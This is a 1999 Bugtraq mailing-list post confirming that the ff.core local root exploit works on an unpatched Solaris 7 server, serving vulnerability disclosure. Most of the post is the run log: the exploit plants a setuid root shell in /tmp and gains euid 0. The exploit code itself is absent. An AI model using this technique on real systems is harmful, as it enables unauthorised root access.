[9012] in bugtraq


ff.core exploit on Solaris (2.)7

daemon@ATHENA.MIT.EDU (Daniel J. Frasnelli)
Sat Jan 9 15:38:18 1999

Date: 	Fri, 8 Jan 1999 12:43:20 -0500
Reply-To: "Daniel J. Frasnelli" <dfrasnel@CSEE.WVU.EDU>
From: "Daniel J. Frasnelli" <dfrasnel@CSEE.WVU.EDU>
X-To:         John McDonald <jmcdonal@UNF.EDU>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <Pine.OSF.4.05.9901070946310.11222-100000@osprey.unf.edu>

Greetings,
        Confirmed ff.core exploit does exist in Solaris 7, server
edition.  System is straight installation, no patches of any category
available for 7 from Sunsolve yet.

Daniel

(12:32,99-01-08)
(dfrasnel@rogue)[~]> uname -spr
SunOS 5.7 sparc

(12:34,99-01-08)
(dfrasnel@rogue)[~]> ./test
Testing if exploit is possible...
Test successful. Proceeding...
Backing up clobbered files to /tmp/.bk
Doing sploit...
Done with sploit. Testing and trying to clean up now...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Connection closed by foreign host.
w00p! Should have a suid root sh in /tmp/bob
btw, its rksh because solaris is silly
Let me try to clean up my mess...
everything should be cool.. i think :>
# ls -la /tmp/bob
-rwsr-xr-x   1 root     root      192764 Jan  8 12:32 /tmp/bob
# id
(snip) euid=0(root)
